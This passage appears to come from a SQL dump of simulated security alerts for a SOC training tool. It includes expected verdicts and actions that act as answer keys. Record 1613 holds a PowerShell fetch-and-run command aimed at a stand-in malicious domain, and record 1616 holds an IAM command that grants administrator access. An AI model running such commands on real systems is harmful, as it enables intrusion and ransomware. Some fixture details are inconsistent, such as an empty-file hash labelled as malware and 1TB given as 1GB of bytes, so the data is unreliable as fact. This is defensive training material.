detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:45Z\\\",\\\"event_id\\\":\\\"4634\\\",\\\"source_ip\\\":\\\"45.76.23.94\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"target_username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"event_description\\\":\\\"Credential dumping attempt detected from process mimikatz.exe targeting lsass.exe.\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.723Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:45Z\\\",\\\"event_id\\\":\\\"4634\\\",\\\"source_ip\\\":\\\"45.76.23.94\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"target_username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"event_description\\\":\\\"Credential dumping attempt detected from process mimikatz.exe targeting 
lsass.exe.\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.723Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:45Z\\\",\\\"event_id\\\":\\\"4634\\\",\\\"source_ip\\\":\\\"45.76.23.94\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"target_username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"event_description\\\":\\\"Credential dumping attempt detected from process mimikatz.exe targeting lsass.exe.\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.723Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:45Z\\\",\\\"event_id\\\":\\\"4634\\\",\\\"source_ip\\\":\\\"45.76.23.94\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"target_username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"event_description\\\":\\\"Credential dumping attempt detected from process mimikatz.exe targeting lsass.exe.\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.723Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:45Z\\\",\\\"event_id\\\":\\\"4634\\\",\\\"source_ip\\\":\\\"45.76.23.94\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"target_username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"event_description\\\":\\\"Credential dumping attempt detected from process mimikatz.exe targeting lsass.exe.\\\",\\\"severity\\\":\\\"Critical\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1610, 'Exfiltration: Data Transfer to External Server', 'critical', 'Network Traffic Analysis', 'Sensitive data has been exfiltrated to an attacker-controlled server using encrypted channels. Immediate action is required to prevent exposure of critical information.', 'Data Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:58Z\",\"event_id\":\"EXF123456\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":4443,\"protocol\":\"HTTPS\",\"data_transferred\":\"5GB\",\"encryption\":\"TLSv1.2\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"filename\":\"confidential_report_2023.zip\",\"action\":\"Data Transfer\",\"alert\":\"Data Exfiltration Detected\"}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known data exfiltration malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"internal\",\"details\":\"File contains sensitive business information\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"John Doe, employee with access to sensitive 
data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1611, 'NRA Attack: Ransom Note and Extortion', 'critical', 'Incident Response Reports', 'An extortion attempt was detected, where the attacker has left a ransom note demanding payment for data decryption and non-disclosure. This is a critical step in the operation, indicating the potential for data leak if demands are not met.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:37:05Z\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"ransom_note_filename\":\"READ_ME.txt\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"files_encrypted\":[\"confidential_data.docx\",\"financial_report.xlsx\"],\"ransom_amount\":\"5 BTC\",\"contact_email\":\"ransom@maliciousdomain.com\",\"notes\":\"Your files have been encrypted. Pay 5 BTC to the address provided or your data will be publicly released.\"}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP linked to known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware encryption tools.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"ransom@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Email used in extortion attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:37:05Z\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"files_encrypted\\\":[\\\"confidential_data.docx\\\",\\\"financial_report.xlsx\\\"],\\\"ransom_amount\\\":\\\"5 BTC\\\",\\\"contact_email\\\":\\\"ransom@maliciousdomain.com\\\",\\\"notes\\\":\\\"Your files have been encrypted. Pay 5 BTC to the address provided or your data will be publicly released.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:37:05Z\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"files_encrypted\\\":[\\\"confidential_data.docx\\\",\\\"financial_report.xlsx\\\"],\\\"ransom_amount\\\":\\\"5 BTC\\\",\\\"contact_email\\\":\\\"ransom@maliciousdomain.com\\\",\\\"notes\\\":\\\"Your files have been encrypted. 
Pay 5 BTC to the address provided or your data will be publicly released.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:37:05Z\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"files_encrypted\\\":[\\\"confidential_data.docx\\\",\\\"financial_report.xlsx\\\"],\\\"ransom_amount\\\":\\\"5 BTC\\\",\\\"contact_email\\\":\\\"ransom@maliciousdomain.com\\\",\\\"notes\\\":\\\"Your files have been encrypted. Pay 5 BTC to the address provided or your data will be publicly released.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:37:05Z\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"files_encrypted\\\":[\\\"confidential_data.docx\\\",\\\"financial_report.xlsx\\\"],\\\"ransom_amount\\\":\\\"5 BTC\\\",\\\"contact_email\\\":\\\"ransom@maliciousdomain.com\\\",\\\"notes\\\":\\\"Your files have been encrypted. 
Pay 5 BTC to the address provided or your data will be publicly released.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:37:05Z\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"files_encrypted\\\":[\\\"confidential_data.docx\\\",\\\"financial_report.xlsx\\\"],\\\"ransom_amount\\\":\\\"5 BTC\\\",\\\"contact_email\\\":\\\"ransom@maliciousdomain.com\\\",\\\"notes\\\":\\\"Your files have been encrypted. Pay 5 BTC to the address provided or your data will be publicly released.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1612, 'Suspicious Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected targeting Capcom employees, containing a malicious attachment designed to deploy the Ragnar Locker ransomware.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:22:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.55\",\"email_subject\":\"Urgent: Update Required\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"employee@capcom.com\",\"attachment_name\":\"Invoice_Update.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_family\":\"Ragnar Locker\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-15 19:18:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Ragnar Locker ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in recent phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to malware sample associated with Ragnar Locker.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Update.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Common filename used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.734Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1613, 'Unusual PowerShell Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A PowerShell script was detected executing on a compromised machine following a successful phishing attack. The script was used to download and execute the Ragnar Locker ransomware payload, indicating the beginning of the ransomware execution phase.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:22:35Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-5G7H9BK\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/ragnar_locker.ps1\')\\\\\\\"\",\"source_ip\":\"198.51.100.42\",\"destination_ip\":\"192.168.1.10\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"ragnar_locker.ps1\"}', '2026-03-15 19:18:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware activities.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"ragnar_locker.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatCrowd\",\"verdict\":\"malicious\",\"details\":\"File associated with Ragnar Locker ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Ragnar Locker script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, 
NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1614, 'New User Account Creation', 'high', 'Active Directory Logs', 'A new user account \'tempAdmin\' was created with elevated privileges. This account is suspected to be part of an attacker’s persistence strategy to maintain access to the network and move laterally undetected.', 'Persistence', 'T1136.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4720\",\"event_source\":\"Security\",\"computer_name\":\"AD-Server01\",\"user\":{\"target_user_name\":\"tempAdmin\",\"target_user_domain\":\"internal.local\",\"target_user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"caller_user_name\":\"admin_jdoe\",\"caller_user_domain\":\"internal.local\",\"caller_user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-500\"},\"network\":{\"source_ip\":\"192.168.15.23\",\"destination_ip\":\"10.0.0.5\"},\"attacker\":{\"ip\":\"203.0.113.45\",\"malware_file\":\"backdoor.exe\",\"malware_hash\":\"4d7c8a7ef9f5b9cfc7a5e0fdf5f8b0e7\"}}', '2026-03-15 19:18:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"tempAdmin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Newly created user account with elevated privileges.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4d7c8a7ef9f5b9cfc7a5e0fdf5f8b0e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1615, 'Large Data Transfer Detected', 'critical', 'Network Traffic Analysis', 'A massive data transfer involving 1TB of sensitive data was detected being exfiltrated to an external IP address. The data included unreleased game details, and the operation concluded with a ransom demand.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.199.108.153\",\"bytes_transferred\":1073741824,\"protocol\":\"HTTPS\",\"source_port\":443,\"destination_port\":443,\"file_hash\":\"57d4e1a3f4b2c3d4e5f6a7b8c9d0e1f2\",\"filename\":\"unreleased_game_details.zip\",\"user\":\"jdoe\",\"indicator_of_compromise\":true,\"action_taken\":\"none\",\"additional_info\":{\"ransom_demand\":\"5 BTC\",\"malware_family\":\"Maze\"}}', '2026-03-15 19:18:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"57d4e1a3f4b2c3d4e5f6a7b8c9d0e1f2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Maze ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"unreleased_game_details.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Intelligence\",\"verdict\":\"internal\",\"details\":\"Contains sensitive unreleased game data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1616, 'AWS IAM Privilege Escalation Detected', 'critical', 'AWS GuardDuty', 'A potential AWS IAM privilege escalation attempt was detected through a misconfigured policy change. An external IP made unauthorized changes.', 'Privilege Escalation', 'T1068', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:12:34Z\",\"event_type\":\"policy_change\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"hostname\":\"aws-instance-1\",\"request_body\":\"\",\"command_line\":\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in suspicious policy changes\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of privilege escalation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with previous malicious activities and the command executed is indicative of privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:34Z\\\",\\\"event_type\\\":\\\"policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"aws-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:34Z\\\",\\\"event_type\\\":\\\"policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"aws-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:34Z\\\",\\\"event_type\\\":\\\"policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"aws-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
